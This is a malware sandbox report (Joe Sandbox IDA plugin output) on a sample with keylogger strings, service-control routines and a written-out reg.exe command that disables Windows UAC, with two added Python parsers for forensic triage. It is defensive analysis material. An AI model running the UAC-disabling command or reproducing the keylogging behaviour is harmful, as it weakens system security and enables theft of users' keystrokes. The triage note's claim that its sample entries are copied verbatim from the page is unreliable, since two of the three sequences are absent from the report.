                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                • Opcode Fuzzy Hash: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                • Opcode Fuzzy Hash: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                Uniqueness

                                Uniqueness Score: -1.00%
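
Triage note (added here, not part of the Joe Sandbox output): the three ADVAPI32 sequences above open a caller-supplied service with SERVICE_STOP (0x20), SERVICE_PAUSE_CONTINUE (0x40) or SERVICE_START (0x10) access and then issue SERVICE_CONTROL_STOP (1), SERVICE_CONTROL_PAUSE (2) or StartServiceW, so the implant can stop, pause and start services on demand. The Python below is an added example, not code from the report or from the sample: it parses API-call lines in the report's own `Name.MODULE(args), ref: addr` layout and decodes service-control calls into a behaviour summary. The sample input is the three sequences copied from this page, the constant names are from winsvc.h, and the function and class names are mine.

```python
import re
from dataclasses import dataclass

# One API-call line in the report's layout: Name.MODULE(arg,arg,...), ref: ADDR
CALL_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Service access rights and control codes as defined in winsvc.h
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}

# Constructed sample: the three ADVAPI32 sequences listed in this report, copied verbatim.
# Handles read as 00000000 because the static view does not know their run-time values.
SAMPLE_ENTRIES = [
    """• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA""",
    """• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9""",
    """• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80""",
]


@dataclass
class Call:
    api: str
    module: str
    args: list   # int for 8-digit hex literals, None for '?', str for anything else
    ref: int


def parse_calls(text):
    """Parse every API-call line in a function entry; non-call lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue  # headings and "Part of subcall function" lines are not calls
        args = []
        for a in m.group("args").split(","):
            a = a.strip()
            if a == "?":
                args.append(None)
            elif re.fullmatch(r"[0-9A-Fa-f]{8}", a):
                args.append(int(a, 16))
            elif a:
                args.append(a)
        calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_access(mask):
    names = [name for bit, name in SERVICE_ACCESS.items() if mask & bit]
    return names or ["0x%x" % mask]


def summarize_service_function(text):
    """Classify one function's calls as a service start/stop/pause; None if it is not SCM code."""
    by_api = {c.api: c for c in parse_calls(text)}
    if "OpenServiceW" not in by_api:
        return None
    detail = {"access": decode_access(by_api["OpenServiceW"].args[2])}  # dwDesiredAccess
    if "StartServiceW" in by_api:
        return "start", detail
    if "ControlService" in by_api:
        code = by_api["ControlService"].args[1]                          # dwControl
        detail["control"] = SERVICE_CONTROL.get(code, "0x%x" % code)
        return {1: "stop", 2: "pause", 3: "continue"}.get(code, "control"), detail
    return "open", detail


if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        print(summarize_service_function(entry))
```

The same parser works for any function entry on this page; the service decoding only fires when OpenServiceW is present, so feeding it the Sleep or CreateFileW entries returns None rather than a false label.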

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                • wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                • API String ID: 1497725170-248792730
                                • Opcode ID: a7c6f27475bfec295d022b2ba5d983e1240c8cfcb4a2fe4930fa699ea7be73b7
                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                • Opcode Fuzzy Hash: a7c6f27475bfec295d022b2ba5d983e1240c8cfcb4a2fe4930fa699ea7be73b7
                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                Uniqueness

                                Uniqueness Score: -1.00%
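
Forensics note (added here, not part of the Joe Sandbox output): the wsprintfW format `[%04i/%02i/%02i %02i:%02i:%02i ` together with the `Offline Keylogger Started` and `]` strings above fixes the header layout of the offline keylog this sample writes, i.e. `[YYYY/MM/DD HH:MM:SS <text>]`. The Python below is an added example, not code from the report or from Remcos: it parses a recovered log of that shape into timestamped entries and splits it into sessions at each `Offline Keylogger Started` marker. The sample log is constructed; only the marker text comes from this page, while the use of the same header form for window titles and the `[Enter]`/`[Tab]` key tokens are assumptions about the body format.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime

# Header written by the sample's wsprintfW format "[%04i/%02i/%02i %02i:%02i:%02i " + text + "]"
HEADER_RE = re.compile(r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*)\]$")
SESSION_MARKER = "Offline Keylogger Started"   # literal string from this report

# Constructed sample log. Only the session marker is taken from this page; window titles as
# further headers of the same form and the [Enter]/[Tab] key tokens are assumptions.
SAMPLE_KEYLOG = """[2024/03/28 09:12:03 Offline Keylogger Started]
[2024/03/28 09:12:41 Untitled - Notepad]
meeting notes for thursday
[2024/03/28 09:15:02 Sign in - Google Accounts - Google Chrome]
alice@example.com[Tab]correct horse battery staple[Enter]
[2024/03/28 13:40:10 Offline Keylogger Started]
[2024/03/28 13:41:55 Command Prompt]
whoami[Enter]
"""


@dataclass
class Entry:
    when: datetime
    label: str                                  # text between the timestamp and the closing bracket
    body: list = field(default_factory=list)    # captured lines up to the next header


def parse_keylog(text):
    """Split a keylog into header entries; every non-header line belongs to the last header."""
    entries = []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            y, mo, d, h, mi, s = (int(x) for x in m.groups()[:6])
            entries.append(Entry(datetime(y, mo, d, h, mi, s), m.group(7)))
        elif entries:
            entries[-1].body.append(line)
        # text before the first header has nothing to attach to and is dropped
    return entries


def sessions(entries, marker=SESSION_MARKER):
    """Group entries into sessions; each marker entry starts a new one."""
    out = []
    for e in entries:
        if e.label == marker or not out:
            out.append([])
        out[-1].append(e)
    return out


def timeline(text):
    """Per session: (start time, number of windows logged, number of captured lines)."""
    return [(s[0].when.isoformat(sep=" "),
             sum(1 for e in s if e.label != SESSION_MARKER),
             sum(len(e.body) for e in s))
            for s in sessions(parse_keylog(text))]


if __name__ == "__main__":
    for row in timeline(SAMPLE_KEYLOG):
        print(row)
```

Session boundaries matter during an investigation because each marker corresponds to a start of the keylogger thread, which places the moments the implant was (re)launched on the host timeline alongside the captured window titles.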

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: XQG
                                • API String ID: 1958988193-3606453820
                                • Opcode ID: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                • Opcode Fuzzy Hash: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                • GetLastError.KERNEL32 ref: 0041D580
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                Strings
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                • SetEvent.KERNEL32(?), ref: 0040512C
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                • CloseHandle.KERNEL32(?), ref: 00405140
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: KeepAlive | Disabled
                                • API String ID: 2993684571-305739064
                                • Opcode ID: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                • Opcode Fuzzy Hash: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 004493BD
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00449589
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                  • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                Yara matches
                                Similarity
                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 2180151492-0
                                • Opcode ID: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                • Opcode Fuzzy Hash: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                • _free.LIBCMT ref: 0044F3BF
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID:
                                • API String ID: 1852769593-0
                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                • _free.LIBCMT ref: 004482D3
                                • _free.LIBCMT ref: 004482FA
                                • SetLastError.KERNEL32(00000000), ref: 00448307
                                • SetLastError.KERNEL32(00000000), ref: 00448310
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpen$FileImageName
                                • String ID:
                                • API String ID: 2951400881-0
                                • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 004509D4
